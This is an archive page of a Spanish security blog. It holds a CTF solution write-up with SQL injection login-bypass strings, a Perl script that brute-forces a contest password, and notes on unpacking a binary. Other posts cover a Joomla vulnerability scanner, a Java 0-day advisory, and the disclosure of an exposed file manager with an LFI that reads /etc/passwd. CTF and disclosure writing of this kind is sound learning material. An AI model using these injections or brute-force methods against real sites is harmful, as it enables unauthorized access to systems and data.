Archivo de la etiqueta: Hackear webs

Solucionario reto hacking enise

Como han quitado el reto no me acuerdo muy bien de algunas pruebas pero algunas soluciones serían:

Nivel 1-A

Había que saltarse la siguiente expresión regular: ^\-(?=.*d)(?=.*[a-z])(?=.*[A-Z]).{6,}

Una posible solución es: -o=o o=oo o=oO66

Para resolverlo yo cogí y lo dividí en 3 apartados (en una copia en local) y fui saltando uno a uno los filtros:

(?=.*d) -> se pasa con o=0

(?=.*[a-z]) -> se pasa con o=00

(?=.*[A-Z]).{6,} -> se pasa con o=oO66

Esta es una posible solución, pero hay muchísimas.

Nivel 1-B

Editando el fuente de la página vemos al final un comentario con un texto en base64: cDNwMXQwXzA=

Que en texto plano es: p3p1t0_0

Una web para convertir de base64 a ASCII es: http://home2.paulschou.net/tools/xlate/ aunque hay millones

Nivel 1-C

Yo la pasé con la siguiente inyección:

user: enise
pass: ‘ or ‘a’=’a

Nivel 2-A

Nos descargamos el ejecutable y con el PeID vemos que está empaquetado con UPX. Con el OllyDbg quitamos la protección de UPX usando el método de pushad / popad o cualquier otro método, ya que es una protección muy frágil y se puede saltar de muchas formas.

Una vez llegamos al OEP, buscamos en memoria la palabra INCORRECT y al lado está nuestra contraseña: Este3sTuP4$$!

Nivel 2-B

Este no lo pasé pero parece que habían dos carpetas ocultas: bin y log

Nivel 2-C

Yo la pasé con la siguiente inyección:

pass: ‘ or ‘a’=’a’#

Nivel 3-A

Yo la pasé con la siguiente inyección:

user: ‘ or 1=1 or ‘a’=’a
pass: xx

Nivel 3-B

Aquí había que programar. Si probamos todas las combinaciones por fuerza bruta no terminamos nunca así que acotamos aplicando ingeniería inversa, es decir:

^ es un XOR

<<< 8 desplaza 8 bits a la derecha y rellena con ceros a la izquierda

<<< 4 desplaza 4 bits a la derecha y rellena con ceros a la izquierda

Por tanto,

– nuestro valor final debe ser 436 (en hex = 1B4 y en binario = 110110100).

– al meter 4 bits (1 byte) a la derecha, como desconocemos el valor, tendríamos 16 combinaciones, de 0000 a 1111 en binario. Por tanto el resultado oscila entre 6976 y 6991.

– luego multiplicamos por 3 (siempre lo inverso que el javascript original) y por tant0 las combinaciones se disparan, ya que tenemos que multiplicar cada combinación anterior por 3.

– es decir, iria desde 6976*3 (20928) a 6991*3 (20973).

– después, al meter 8 bits (2 bytes) añadimos de 00 a FF, es decir, 256 combinaciones más.

– valor mínimo: 20928 = 51C0 (en hex) … por tanto 51C000 = 5357568 XOR 77886655 = 83211455.

– valor máximo: 20973 = 51ED (en hex) … por anto, 51EDFF = 5369343 XOR 77886655 = 83204416.

– el valor final está entre 83204416 y 83211455 = 7039 combinaciones posibles.

– dentro de estos valores probamos la contraseña si el resultado es 0.

El script  (en perl) que use es este:

#!/usr/bin/perl
use LWP::UserAgent;

my $p = 83204416;
my $res = 0;

while(1) {
 $res = $p ^ 77886655;
 $res = $res >> 8;
 $res = $res / 3;
 $res = $res >> 4;
 $res = $res ^ 436;
 enviar($p) if ($res eq 0);
 $p++;
}
sub enviar {
 my $dato = shift;
 my $cookie = "PHPSESSID=AQUI_MI_COOKIE";
 my $uri = "http://wargame.inteco.es/level3b.php";
 my $ua = LWP::UserAgent->new();

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
 @header = ('User-Agent' => $useragent, 'Cookie' => $cookie,  'Connection' => 'keep-alive', 'Keep-Alive' => '300', Content =>  [ password => $dato ]);
 my $response = $ua->post($uri, @header);
}

Nivel 3-C

Este era un fichero Flash. Editando el fuente de la web vemos el fichero SWF. Lo descargamos y con una versión de pruebas de Shothink SWF lo abrimos y echamos un ojo al fuente.

Hay un user/pass para despistar pero al final tenemos un hash con nuestra clave. No pa recuerdo ahora mismo pero era algo así como palillos o alguna palabreja similar.

Reto de hacking Enise

Sólo ha durado 2 días y ha sido algo chapucero (dado que el primer día fallaban 4 de las 9 pruebas y, esto hizo que perdiéramos mucho tiempo tratando de inyectar en páginas que no funcionaban … y al tratarse de un blind, ni te enterabas) pero, al final gané en la Modalidad A. Lo malo es que no puedo optar al premio ya que se me pasó la época universitaria jejeje.

Estimado señor,

Nos ponemos en contacto con usted como potencial ganador del concurso
Wargame celebrado en ENISE. Para poder nombrarle como ganador del evento
necesitamos que nos envíe a la mayor brevedad su nombre completo y
teléfono móvil, además de la acreditación de la matrícula en el último año
de carrera o FP de grado superior. En el momento en el que lo recibamos,
nos pondremos en contacto con usted.

Un saludo,

He de decir que si no llegan a fallar los 4 retos, el justo ganador habría sido RoMaN (el cual tampoco habría tenido premio, jejeje. Y bueno, aunque corto, ha sido divertido.

Muchas gracias a los organizadores por este reto (y la próxima vez, a ver si probamos los retos antes xDDD). Enhorabuena al ganador (el que sí que cumple los requisitos)

Solucionario al reto RootedCON’2010

Ya que Roman ha publicado en su web (http://www.rs-labs.com) los solucionarios al reto RootedCON’2010, he subido a mi web las soluciones que le mandé yo. Las podeis ver aquí: http://pepelux.org/download.php?f=papers/rootedctf_pepelux_es.pdf

Entre más de 1.000 participantes lo hemos terminado 18. La verdad es que ha sido duro, pues fueron 7 retos, 3 de los cuales tenían su miga. Tras 4 días pegado al ordenador, ha sido una experiencia muy buena ya que lo he pasado genial, además de aprender muchas cosas que he tenido que ir estudiando/repasando sobre la marcha.

He intentado escribir el solucionario lo más detallado posible para que se pueda seguir sin problemas, anotanto tanto las soluciones como los ‘malos caminos’ que seguí y los tropezones que me di por el camino.

Agradecer a Roman, a Dreyer y a todos los colaboradores y patrocinadores el excelente trabajo, que no ha defraudado en absoluto. Cada una de las pruebas ha sido un verdadero reto y ninguna de ellas ha defraudado. Además, se han pegado una currada impresionante y el resultado ha sido excelente. Espero que se animen y el año que viene hagan más retos.

A diferencia de otros retos, los datos eran reales, es decir, no se trataba de una simulación de una base de datos sino que había que hackear la base de datos en sí, accediendo al information_schema y teniendo que aplicar conocimientos bastante altos de MySQL, unidos a la perspicacia de cada uno.

Espero que os guste el solucionario. Un saludo

Web challenges from RootedCON’2010 CTF

Si eres un apasionado de los retos de hacking, esta tarde a las 20:00 hora española dará comienzo un nuevo reto creado por RoManSoFt y Dreyer que, conociendo a estos dos personajes, la verdad es que proteme ser muy interesante … y también difícil.

Más info del concuro aquí: http://www.rs-labs.com/noticias/#38

Date prisa que sólo quedan unas horas para que de comienzo 🙂

Joomla Scan en perl

Tras lanzar la versión 2.1 para windows de JoomlaScan he reescrito el código en perl. Ya está disponible en mi web la versión 1.1, que hace exactamente lo mismo sólo que permite usarlo tanto en Linux como en Windows.

Ante versiones nuevas o modificaciones en la base de datos, podeis hacer un update y se actualiza sólo.

Para descargarlo … click aquí: JoomlaScan v1.1 en perl

Joomla Scan v1.2

Acabo de subir a la web un nuevo programa que he terminado (tengo varios a medias siempre :)). Se trata de JoomlaScan, y lo que hace básicamente es analizar remotamente una web (Joomla, claro!) y detectar la versión que está corriendo. Salvo un par o tres de versiones que no saca exactas, el resto te da con exactitud la versión y revisión que usa, incluidas las betas de la 1.6. Además de esto también saca un listado con los componentes que usa.

Para la detección de versión de Joomla me he basaco en un genial script en perl de OWASP, cuyo proyecto se abandonó en diciembre del 2008 y, por lo cual sólo era capaz de detectar hasta la versión 1.5.12.

El método usado consiste en comprobar una serie de ficheros que varían de una versión a otra, así como otros que contienen el ID de la última revisión. En resumen, ralizando muchas verificaciones en varios ficheros se llega a acortar el margen entre versiones hasta dar con la exacta.

Además de eso, me he pegado la gran currada de introducir todos los avisos que hay en securityfocus y que hacen referencia a Joomla, de manera que tras detectar la versión, muestra un listado con los posibles bugs que afectan a esa versión o a cualquiera de los componentes instalados.

El programa al arrancarse comprueba si hay nuevas versiones o actualizaciones de la base de datos, de manera que cada vez que suba un nuevo bug se actualizará sólo.

Podeis descargarlo aquí: JoomlaScan

Aviso: Este programa no es para hackear nada sino para hacer un autoanálisis de nuestras webs en Joomla y no me hago responsable si alguien le da un mal uso …

Protección de datos … what is this?

Me encanta avisar a las empresas cuando detecto un fallo de seguridad (es una ironía). Realmente me parece una estupidez ya que pueden pasar 3 cosas:

1- Que te ignoren (es lo más habitual)

2- Que te digan que ellos no tienen ningún fallo y que dejes de tocar los co**nes (suele pasar)

3- Que te agradezcan el aviso (esto no suele ocurrir nunca)

No es que me dedique a buscar fallos en webs pero muchas veces se te presentan sólos y la curiosidad te lleva siempre a mirar un poco más allá. Intentando no rebasar los límites de lo legal vas mirando aquí, vas mirando allá, con los ojos como platos por la sorpresa. ‘:-o … No es posible lo que estoy viendo …’

Normalmente me digo a mi mismo … ‘Oh my God!’ y cierro la web para evitar tentaciones, porque si avisas son todo problemas; pero esta vez fue diferente. Esta vez llegué a través de una búsqueda de Google, a una web de una entidad bancaria vinculada a una entidad bancaria, que me mostraba los datos de sus empleados: nombre, apellidos, dni, dirección, teléfonos particulares, mail del trabajo, mail personal, oficina en la que trabajan, cargo que ocupan, número de cuenta bancaria … SI, su número de cuenta bancaria (del director, del interventor, del cajero, …) algo verdaderamente escandaloso, vergonzoso, indignante … vamos, para meter a los ingenieros a picar piedras un mes.

No es que estén los datos de todos los empleados sino que se trata de un club para el personal de la entidad al que se suscriben para hacer viajes y otras cosas. Pues toda esa gente tenía sus datos personales ahí, a la vista de todo el mundo.

Y lo peor de todo no es eso, sino que tras digerir los datos que Google me estaba mostrando, decidí entrar en el directorio raíz donde estaban esos datos y me encontré un File Manager, el cual no pedía ni usuario ni contraseña ni nada de nada. Ale!!! alegría!!!! acceso libre al sistema.

El gestor de archivos te permitía navegar por ciertos directorios y descargar, subir, modificar o borrar archivos libremente. No tuve que exprimir mucho la neurona para averigurar que ese gestor de archivos era de código abierto, un proyecto de sourceforge que, tras descargar el código fuente (del año 2003 la última actualización!, casi nada!) lo analicé y vi que, obviamente, estaba lleno de fallos de seguridad, que, entre otras cosas permitían hacer un LFI y sacar el /etc/passwd, y cualquier archivo del sistema al que se tuviera acceso (todo esto lo probé en local en mi máquina tras bajar los fuentes de sourceforge, eh! no pienses mal 😛 ) …

La descripción del bug de ese File Manager lo puedes encontrar en mi web, aquí: sFileManager

Bueno, la entidad en cuestión es la CAM (Caja de Ahorros del Mediterráneo) y el motivo por el que me siento estúpido tras avisar es que sigo esperando una respuesta o un mensaje de agradecimiento que nunca llegará, como viene siendo habitual. Eso sí, la carpeta con los datos la han borrado totalmente parcialmente (al menos los datos del personal y el File Manager han desaparecido … hasta han desaparecido de la caché de Google!!), por lo que deduzco que han recibido mi mail. Al menos me queda la satisfacción de que los pobres empleados de la CAM ya no tienen sus datos personales a la vista de todo el mundo.

Sí, las cosas suceden así, mandas el aviso, que llega al buzón general. Una persona lo lee y no entien nada (puaj! habla de cosas de informática … se lo reenviaré a la empresa que lleva la web). Luego la empresa que lleva el mantenimiento le da una colleja al becario de turno, parchea rápidamente y borra toda evidencia antes de que se entere alguien y llegue la sangre al río. Sólo decir que la web tiene más fallos de seguridad fácilmente detectables pero como no quiero hacer nada ilegal no voy a profundizar ni a dar más detalles. Pero una empresa con tanto dinero … que contraten una auditoría de seguridad, c**o!!!

El mail que les mandé fue este:

Por favor remitan esto urgentemente a su departamento de informática porque me parece algo verdaderamente increible que una entidad como la CAM deje datos personales (de sus empleados) a la vista de todos. Me explico …

Realizando una búsqueda en Google llegué a la siguiente página:
http://webcache.googleusercontent.com/search?q=cache:mRhm4rpYt2AJ:www.elclubcam.com/ficheros/logs/Alta%2520socio+site:elclubcam.com/ficheros&cd=2&hl=es&ct=clnk&gl=es&client=firefox-a

en la que me salen un montón de datos de gente, donde aparecen DNIs, direcciones de email, teléfonos, etc (aquí ya están violando la ley al tener esa información pública en Internet). Siguiendo mi curiosidad me decido a entrar en la web http://www.elclubcam.com y veo un lugar donde pone ‘hazte socio’ y un link a un formulario que, casualmente se asemeja mucho a los datos que me encontré en la página anterior. Cuál es mi sorpresa cuando veo que entre los datos hay números de cuenta, entre otras cosas. Vamos, los números de cuenta, direcciones, teléfonos, mails, dni, apellidos, etc del personal de su empresa, incluída la oficina dónde trabajan!!!

Aparte de esto, entro en http://www.elclubcam.com/ficheros/ y me veo un listado de archivos con un file manager (gestor de archivos), accesible sin usuario y contraseña, y sin que diga nada de acceso restrigido ni información privada ni nada de nada …. y, desde el cual se puede ver todo el contenido privado de la web (es decir, muchos listados con datos personales de empleados). Es más, ese gestor de archivos (público, gratuito, y, con el código fuente en http://onedotoh.sourceforge.net) es del año 2003 y tiene fallos de seguridad que permiten acceder a todo el servidor, es decir, no sólo a la web sino a todo el sistema. (más información aquí: http://www.pepelux.org/download.php?f=exploits/sfilemanager.txt)

Si su departamente informático desea más detalles pueden contactar conmigo. Espero que lo resuelvan rápido o, al menos quiten los datos de sus empleados de Internet ya que, repito, hay hasta datos bancarios!

Un saludo

Rectificación: Bueno, quiero aclarar (ya que me han llegado algunos mails) que esta web creo que la lleva una empresa externa y no la propia CAM, aunque como ya he dicho, creo que si de una u otra forma está vinculada a la entidad, deben prestar cierta atención. No obstante, a pesar de que los datos eran de personal de la CAM, no creo que el equipo informático de esta sean los responsables del ‘descuido’.

Vulnerabilidad 0-day en Java

Hace unas horas investigadores en seguridad encontraron una vulnerabilidad 0-day en la plataforma Java, que puede ejecutar código remoto desde cualquier navegador que tenga instalado el plugin de Java.

Para aquellos que no lo sepan, una vulnerabilidad 0-day es aquella que es descubierta antes que exista un parche para remediarla y, por lo tanto puede ser explotada sin existir controles específicos para la protección del usuario. Cuando una vulnerabilidad 0-day se hace masiva, su tasa de éxito puede ser muy elevada y puede ser aprovechada por gusanos (llamada wormeable vulnerability) para aumentar su propagación en miles de usuarios y aprovecharse de las ventajas que dan las redes interconectadas.

En esta oportunidad, el reporte en seclists.org informa que un problema en la validación de parámetros puede permitir a un atacante crear un sitio web que explote dicha vulnerabilidad, con unas pocas líneas de programación. Es decir, no es una vulnerabilidad difícil de explotar, lo cual agrava el descubrimiento y aumenta el riesgo para los usuarios.

Se ha comprobado que es posible explotar la vulnerabilidad en los sistemas operativos Microsoft Windows (desde la versión 2000 hasta la 7, inclusive) y Linux que tengan instalado el plugin Java SE Runtime Environment 6 Update 10 en adelante (la actual es el Update 19). MAC OS es la única plataforma desde donde no es posible explotar la vulnerabilidad.

¿Qué puede hacer el usuario? Por el momento recomendamos seguir dos pasos. En primer lugar, comprobar si son vulnerables. Para ello, pueden visitar los enlaces que dejo a continuación y verificar si en sus sistemas se ejecuta la calculadora de Windows (importante: el enlace es inofensivo, sólo es para probar si un sistema es o no vulnerable):

http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1

De nuevo: si al abrir el enlace NO  se abrió la calculadora, su sistema no es vulnerable, puede seguir navegando tranquilo (al menos respecto a esta vulnerabilidad). Si se abrió la calculadora, es recomendable pasar al segundo paso, aplicar un workaround, un procedimiento que permiten no exponerse a una vulnerabilidad.

A pesar de que Sun ya ha sido notificado, la empresa anunció que sacará un parche de seguridad pero que el mismo no será prioritario, y mientras tanto no existe una solución definitiva al problema. Para eso existen los workarounds través de modificaciones en el sistema que no son las más eficientes, pero que solucionan el problema temporalmente. Cuando aparezca el parche, es recomendable volver atrás los cambios del workaround y aplicar la actualización en la aplicación.

En esta oportunidad, el procedimiento para Microsoft Windows consiste en deshabilitar temporalmente un Killbit, tal como indica el siguiente procedimiento de Microsoft: Cómo impedir la ejecución de un control ActiveX en Internet Explorer. Para aquellos más exigentes, obviamente también es posible desinstalar Java del sistema para no ser vulnerables, aunque se perderá usabilidad del mismo.

Les recuerdo a los lectores que no es recomendable aplicar el workaround si no son vulnerables, así como es importante que lo apliquen a la brevedad si han comprobado ser vulnerables.

Ante este tipo de incidentes, donde el fabricante aún no posee un parche, es importante que los responsables de la seguridad en las redes estén al tanto para poder implementar procedimientos adecuados para prevenir inconvenientes mayores y no estar expuestos a estas amenazas, reforzando la importancia de complementar las tecnologías de seguridad con educación tanto del usuario final, como de los responsables de proveer la seguridad en los sistemas.

Sebastián Bortnik
Analista de Seguridad

Fuente: ESSET

Implementación y explotación de Servicios Web

Índice

1. Introducción

2. Montando una plataforma de pruebas. Requisitos

3. Creando una base de datos para pruebas

4. Creando el conector ODBC

5. Creando un servicio web para pruebas

6. Probando el servicio web en remoto

7. Creando un conector en perl

8. Explotando el servicio web

Seguir leyendo Implementación y explotación de Servicios Web

Squipy 1.2 disponible

Ya está disponible la primera versión de Squipy. Como ya comenté, Squipy es un sencillo proxy que permite filtrar y modificar los datos que se envían desde el navegador hacia un servidor web. El interfaz está en castellano y en inglés y su manejo es muy sencillo. Además incorpora algunas herramientas adicionales.

La aplicación dispone de dos modalidades de navegación: por un lado, cuando el filtro de captura está desactivado, hay 10 listener que trabajan de forma asíncrona y permiten navegar sin ningún problema. Una vez activamos la depuración, se queda en un único listener que trabaja de forma síncrona y nos permite depurar y modificar datos.

Características principales:

  • El programa permite capturar y modificar los datos enviados a una web.
  • Dispone de conversión automática de GET a POST y viceversa.
  • Tiene un histórico de páginas capturadas donde almacena toda la información.
  • Incorpora un Spider.
  • Permite decodificar un __VIEWSTATE de páginas asp y aspx.
  • Los datos capturados se pueden formatear mostrándose coloreados para una mejor lectura.
  • Permite exportar las capturas en XML y HTML.

Seguir leyendo Squipy 1.2 disponible